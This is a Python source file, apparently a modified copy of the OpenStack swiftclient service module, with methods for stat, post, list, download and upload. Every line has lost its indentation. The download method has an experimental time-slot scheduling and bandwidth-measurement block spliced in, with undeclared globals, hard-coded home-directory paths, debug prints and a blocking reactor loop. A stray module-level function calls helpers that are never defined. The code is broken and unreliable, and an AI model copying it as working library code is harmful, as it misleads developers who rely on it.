self.object_name = object_name
self.options = options
if self.options is None:
self.destination = None
self.fresh_metadata = False
else:
self.destination = self.options.get('destination')
self.fresh_metadata = self.options.get('fresh_metadata', False)
if self.destination is not None:
destination_components = self.destination.split('/')
if destination_components[0] or len(destination_components) < 2:
raise SwiftError("destination must be in format /cont[/obj]")
if not destination_components[-1]:
raise SwiftError("destination must not end in a slash")
if len(destination_components) == 2:
# only container set in destination
self.destination = "{0}/{1}".format(
self.destination, object_name
)
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
errors on failures caused by either invalid md5sum or size of the
data read.
"""
global avail_bw ; avail_bw=0
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_etag = headers.get('etag')
if ('x-object-manifest' not in headers
and 'x-static-large-object' not in headers and checksum):
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_etag:
etag = self._actual_md5.hexdigest()
if etag != self._expected_etag:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_etag))
if (self._content_length is not None
and self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
create_connection = lambda: get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account, container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
rq = Queue(maxsize=10) # Just stop list running away consuming memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix']
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
error = None
try:
while True:
_, items = conn.get_container(
container, marker=marker, prefix=options['prefix'],
delimiter=options['delimiter']
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
algoChoice = 0;
global timeline;
timeline = 30;
ts = swiftclient.functions.tscalcul();
nbMaxThr = 100;
global countNotAssigned1;
countNotAssigned1 = 0;
global savedObs;
global transferedThr;
transferedThr = [];
global nbslots;
nbslots = [0] * 1200;
global iTransList;
global rejR;
rejR = []
global sched_dict; global sum_meet_deadline ; global sum_data ; global avail_bw ; global sum_bw_consumption
sched_dict = defaultdict(list);
global rejR;
rejR = [];
global usedThr_dict;
usedThr_dict = {};
usedThr_dict = defaultdict(lambda: 0, usedThr_dict)
now = datetime.datetime.now()
print(datetime.datetime.now())
end = now + datetime.timedelta(seconds=timeline)
print(end);
tsNum = 0;
print("timeline = ", timeline)
l = [];
l.append(now);
'''objects2 = ["4_/home/AN28060/Desktop/d4 (copy).txt", "5_/home/AN28060/Desktop/d5 (copy).txt",
"4_/home/AN28060/Desktop/d42 (copy).txt", "4_/home/AN28060/Desktop/d43 (copy).txt",
"5_/home/AN28060/Desktop/d51 (copy).txt", "6_/home/AN28060/Desktop/d6 (copy).txt",
"6_/home/AN28060/Desktop/d61 (copy).txt", "7_/home/AN28060/Desktop/d7 (copy).txt",
"7_/home/AN28060/Desktop/d71 (copy).txt", "8_/home/AN28060/Desktop/d8 (copy).txt",
"8_/home/AN28060/Desktop/d81 (copy).txt", "8_/home/AN28060/Desktop/d82 (copy).txt"]'''
#objects2 = ["403K/403K_1.dat"]
objects1 = glob.glob("/home/AN28060/WorkSpace/Scripts/403K/*.dat"); objects3 = glob.glob("/home/AN28060/WorkSpace/Scripts/678B/*.dat");
objects2 = glob.glob("/home/AN28060/WorkSpace/Scripts/678B/*.dat"); objects4 = glob.glob("/home/AN28060/WorkSpace/Scripts/26K/*.dat");
objects5 = glob.glob("/home/AN28060/WorkSpace/Scripts/403K/*.dat"); objects6 = glob.glob("/home/AN28060/WorkSpace/Scripts/678B/*.dat");
sum_bw_consumption = 0
while now <= end and tsNum < timeline:
now += datetime.timedelta(seconds=ts);
print ("now",now)
l.append(now);
if l[tsNum + 1] == l[tsNum] + datetime.timedelta(seconds=ts):
tsNum = tsNum + 1;
print(" tsnum :", tsNum); swiftclient.shell.sum_data = 0
if tsNum == 1:
objects=[]
for i in range(len(objects1)):
objects.append(objects1[i].split("/",5)[5])
print("o",objects);
if tsNum == 2:
for i in range(len(objects2)):
iTransList.append(objects2[i].split("/",5)[5])
objs = iTransList; print("objects = ", objects);
if tsNum == 3:
for i in range(len(objects3)):
iTransList.append(objects3[i].split("/",5)[5]) ;
for i in range(len(objects4)):
iTransList.append(objects4[i].split("/",5)[5])
objs = iTransList; print("objects = ", objects)
if tsNum == 4:
for i in range(len(objects5)):
iTransList.append(objects5[i].split("/",5)[5]) ;
for i in range(len(objects6)):
iTransList.append(objects6[i].split("/",5)[5])
objs = iTransList; print("objects = ", objects)
sched_dict, objs, iTransList = swiftclient.scheduling.schedule_requests_per_ts(algoChoice, tsNum, ts, nbMaxThr, timeline, objects);
# else: objs = objects ;
print (" ************************ iTransList",iTransList)
if algoChoice == 1:
nbslots = swiftclient.scheduling.checkRequestScheduled(objs);
print("nbslots ", nbslots);
print("objs", objs);
sched_dict = swiftclient.scheduling.switchTS(tsNum, ts, objs, nbslots, nbMaxThr, timeline, sched_dict, usedThr_dict);
sleep(ts);
print ("objs",objs) ; '''objects = objects.extend(iTransList);
for i in range(len(objs)):
if len(objs[i].split("_", 1)) == 2:
objects.append(objs[i].split("_", 1)[1])
i = i + 1'''
objects = [] ; print (len(sched_dict))
if tsNum in sched_dict: print (sched_dict[tsNum])
for i in range(len(objs)):
print("len(objs[i].split(""))", len(objs[i].split("_")))
if objs[i] in sched_dict[tsNum] and len(objs[i].split("_",1)) == 2 :
objects.append(objs[i].split("_",1)[1])
if objs[i] in sched_dict[tsNum] and len(objs[i].split("_",1)) == 3 :
print ("here") ;objects.append(objs[i].split("_",1)[1]+"_"+objs[i].split("_",1)[2])
print ("objects to download ", objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
global sum_bw_consumption
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
print (swiftclient.shell.down_dict) ;
if len(swiftclient.shell.down_dict) != 0:
proportion = swiftclient.shell.sum_meet_deadline / len(swiftclient.shell.down_dict)
print ("sum_meet_deadline ", swiftclient.shell.sum_meet_deadline) ; print ("proportion_meet_deadline ", proportion)
print("sum_data ", swiftclient.shell.sum_data)
avail_bw = swiftclient.shell.sum_data / swiftclient.functions.tscalcul(); print ("avail_bw",avail_bw)
sum_bw_consumption += avail_bw ; #timerThread = threading.Thread(target=self.foo()) ; timerThread.start()
#example = ThreadingExample(); sleep(3); print('Checkpoint'); sleep(2); print('Bye')
#sleep(1) ; #print('Doing something imporant in the background', swiftclient.shell.sum_data);previous_data = swiftclient.shell.sum_data ;
l = task.LoopingCall(self.doWork) ; l.start(5) ; reactor.run()
#exit()
avg_bw_consuption = sum_bw_consumption / tsNum
print("sum_bw_consuption",sum_bw_consumption,"tsNum",tsNum)
'''def f(self):
global sum_bw_consumption
print(sum_bw_consumption,"***************************************************************************************************************")# do something here ...
# call f() again in 60 seconds
threading.Timer(60, self.f()).start()'''
def doWork(self):
print (" do work here")
pass
def foo(self):
next_call = time()
while True:
print ( datetime.datetime.now())
next_call = next_call + 1;
sleep(next_call - time())
def schedule_requests1(algoChoice, timeline, objects): # timeline is the number of timeslots
ts = swiftclient.functions.tscalcul();
nbMaxThr = 100;
global countNotAssigned1;
countNotAssigned1 = 0;
global savedObs;
global transferedThr;
transferedThr = [];
global nbslots;
nbslots = [0] * 1200;
global iTransList;
global rejR;
rejR = []
global sched_dict;
sched_dict = defaultdict(list);
global rejR;
rejR = [];
global usedThr_dict;
usedThr_dict = {};
usedThr_dict = defaultdict(lambda: 0, usedThr_dict)
now = datetime.datetime.now()
print(datetime.datetime.now())
end = now + datetime.timedelta(seconds=timeline)
print(end);
tsNum = 0;
print("timeline = ", timeline)
l = [];
l.append(now);
objects2 = ["4_/home/AN28060/Desktop/d4 (copy).txt", "5_/home/AN28060/Desktop/d5 (copy).txt",
"4_/home/AN28060/Desktop/d42 (copy).txt", "4_/home/AN28060/Desktop/d43 (copy).txt",
"5_/home/AN28060/Desktop/d51 (copy).txt", "6_/home/AN28060/Desktop/d6 (copy).txt",
"6_/home/AN28060/Desktop/d61 (copy).txt", "7_/home/AN28060/Desktop/d7 (copy).txt",
"7_/home/AN28060/Desktop/d71 (copy).txt", "8_/home/AN28060/Desktop/d8 (copy).txt",
"8_/home/AN28060/Desktop/d81 (copy).txt", "8_/home/AN28060/Desktop/d82 (copy).txt"]
while now <= end and tsNum < timeline:
now += datetime.timedelta(seconds=ts);
l.append(now);
if l[tsNum + 1] == l[tsNum] + datetime.timedelta(seconds=ts):
tsNum = tsNum + 1;
print(" tsnum :", tsNum);
sched_dict, objs, iTransList = schedule_requests_per_ts(algoChoice, tsNum, ts, nbMaxThr, timeline,
objects);
if tsNum == 4: iTransList.extend(objects2);objs = iTransList; print("objects = ", objects)
# else: objs = objects ;
if algoChoice == 1:
nbslots = checkRequestScheduled(objs);
print("nbslots ", nbslots);
print("objs", objs);
sched_dict = switchTS(tsNum, ts, objs, nbslots, nbMaxThr, timeline, sched_dict, usedThr_dict);
time.sleep(ts);
return sched_dict
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb')
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(65536)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': 65536,
'headers': req_headers,
'response_dict': results_dict}
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb')
else:
if basename(path):
fp = open(path, 'wb')
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if 'x-object-meta-mtime' in headers and not no_file:
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises: SwiftError
:raises: ClientException
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
# Incase we have a psudeo-folder path for <container> arg, derive
# the container name from the top path and prepend the rest to
# the object name. (same as passing --object-name).
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# wait for first container job to complete before possibly attempting
# segment container job because segment container job may attempt
# to HEAD the first container
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
